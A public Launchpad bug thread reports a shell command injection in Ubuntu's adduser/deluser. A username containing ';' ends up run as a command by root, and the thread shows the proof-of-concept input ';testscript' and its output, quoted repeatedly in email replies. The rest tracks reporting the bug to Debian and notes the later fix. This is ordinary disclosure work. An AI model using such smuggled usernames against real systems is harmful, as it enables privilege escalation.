adduser & deluser shell command injection

A similar bug was created in 2011 but got no attention. https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/782170

It looks to me like the upstream version in Debian is also susceptible. Could you file a bug with Debian as well? https://www.debian.org/Bugs/Reporting

Hi, have you filed a bug with Debian yet? Thanks!

No I haven’t had time to do that. Will update you when I do.
On Fri, 23 Aug 2019 at 11:16 pm, Marc Deslauriers <
<email address hidden>> wrote:

> Hi, have you filed a bug with Debian yet? Thanks!
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1838489
>
> Title:
> adduser & deluser shell command injection
>
> Status in adduser package in Ubuntu:
> New
>
> Bug description:
> deluser program is vulnerable to a command injection vulnerability
> when a user is added via adduser with special characters (such as
> ';'). It is only possible when the user exists on the system (adduser
> does not prevent usernames with ';' to be added.)
>
> This can be a security risk when user accounts on the system can be
> created from arbitrary input, and there are exploitable programs in
> PATH to make privilege escalation possible.
>
> -------------- Proof of concept ----------------
>
> # ll /test-file
> ls: cannot access '/test-file': No such file or directory
>
> # cat /usr/bin/testscript
> #!/bin/bash
> touch /test-file
>
> # deluser
> Enter a user name to remove: ;testscript
> no crontab for root
> crontab: usage error: no arguments permitted after this option
> usage: crontab [-u user] file
> crontab [ -u user ] [ -i ] { -e | -l | -r }
> (default operation is replace, per 1003.2)
> -e (edit user's crontab)
> -l (list user's crontab)
> -r (delete user's crontab)
> -i (prompt before deleting user's crontab)
> /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code
> 1. Exiting.
> (failed reverse-i-search)`': deluser^C
> # ll /test-file
> -rw------- 1 root root 0 Jul 31 10:25 /test-file
>
>
> -------- system description --------
>
> Description: Ubuntu 18.04.2 LTS
> Release: 18.04
>
> # apt-cache policy adduser
> adduser:
> Installed: 3.116ubuntu1
> Candidate: 3.116ubuntu1
> Version table:
> *** 3.116ubuntu1 500
> 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
> 100 /var/lib/dpkg/status
>
> To manage notifications about this bug go to:
>
> https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions
>

Hi! Have you had a chance to report this issue to Debian?

Hi Marc,
I will do it tonight. Will tell you once it’s done :)

On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers <
<email address hidden>> wrote:

> Hi! Have you had a chance to report this issue to Debian?
>
> ** Changed in: adduser (Ubuntu)
> Status: New => Incomplete
>
> ** Information type changed from Private Security to Public Security
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1838489
>
> Title:
> adduser & deluser shell command injection
>
> Status in adduser package in Ubuntu:
> Incomplete
>
> Bug description:
> deluser program is vulnerable to a command injection vulnerability
> when a user is added via adduser with special characters (such as
> ';'). It is only possible when the user exists on the system (adduser
> does not prevent usernames with ';' to be added.)
>
> This can be a security risk when user accounts on the system can be
> created from arbitrary input, and there are exploitable programs in
> PATH to make privilege escalation possible.
>
> -------------- Proof of concept ----------------
>
> # ll /test-file
> ls: cannot access '/test-file': No such file or directory
>
> # cat /usr/bin/testscript
> #!/bin/bash
> touch /test-file
>
> # deluser
> Enter a user name to remove: ;testscript
> no crontab for root
> crontab: usage error: no arguments permitted after this option
> usage: crontab [-u user] file
> crontab [ -u user ] [ -i ] { -e | -l | -r }
> (default operation is replace, per 1003.2)
> -e (edit user's crontab)
> -l (list user's crontab)
> -r (delete user's crontab)
> -i (prompt before deleting user's crontab)
> /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code
> 1. Exiting.
> (failed reverse-i-search)`': deluser^C
> # ll /test-file
> -rw------- 1 root root 0 Jul 31 10:25 /test-file
>
>
> -------- system description --------
>
> Description: Ubuntu 18.04.2 LTS
> Release: 18.04
>
> # apt-cache policy adduser
> adduser:
> Installed: 3.116ubuntu1
> Candidate: 3.116ubuntu1
> Version table:
> *** 3.116ubuntu1 500
> 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
> 100 /var/lib/dpkg/status
>
> To manage notifications about this bug go to:
>
> https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions
>

Hi,

I have reported this bug to Debian:

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577

Warm regards,
Haoxi

On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers <
<email address hidden>> wrote:

> Hi! Have you had a chance to report this issue to Debian?
>
> ** Changed in: adduser (Ubuntu)
> Status: New => Incomplete
>
> ** Information type changed from Private Security to Public Security
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1838489
>
> Title:
> adduser & deluser shell command injection
>
> Status in adduser package in Ubuntu:
> Incomplete
>
> Bug description:
> deluser program is vulnerable to a command injection vulnerability
> when a user is added via adduser with special characters (such as
> ';'). It is only possible when the user exists on the system (adduser
> does not prevent usernames with ';' to be added.)
>
> This can be a security risk when user accounts on the system can be
> created from arbitrary input, and there are exploitable programs in
> PATH to make privilege escalation possible.
>
> -------------- Proof of concept ----------------
>
> # ll /test-file
> ls: cannot access '/test-file': No such file or directory
>
> # cat /usr/bin/testscript
> #!/bin/bash
> touch /test-file
>
> # deluser
> Enter a user name to remove: ;testscript
> no crontab for root
> crontab: usage error: no arguments permitted after this option
> usage: crontab [-u user] file
> crontab [ -u user ] [ -i ] { -e | -l | -r }
> (default operation is replace, per 1003.2)
> -e (edit user's crontab)
> -l (list user's crontab)
> -r (delete user's crontab)
> -i (prompt before deleting user's crontab)
> /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code
> 1. Exiting.
> (failed reverse-i-search)`': deluser^C
> # ll /test-file
> -rw------- 1 root root 0 Jul 31 10:25 /test-file
>
>
> -------- system description --------
>
> Description: Ubuntu 18.04.2 LTS
> Release: 18.04
>
> # apt-cache policy adduser
> adduser:
> Installed: 3.116ubuntu1
> Candidate: 3.116ubuntu1
> Version table:
> *** 3.116ubuntu1 500
> 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
> 100 /var/lib/dpkg/status
>
> To manage notifications about this bug go to:
>
> https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions
>

Thanks!

It's fixed in Debian by version 3.121 and therefore fixed in adduser 3.121ubuntu1 in Ubuntu 22.10 (kinetic).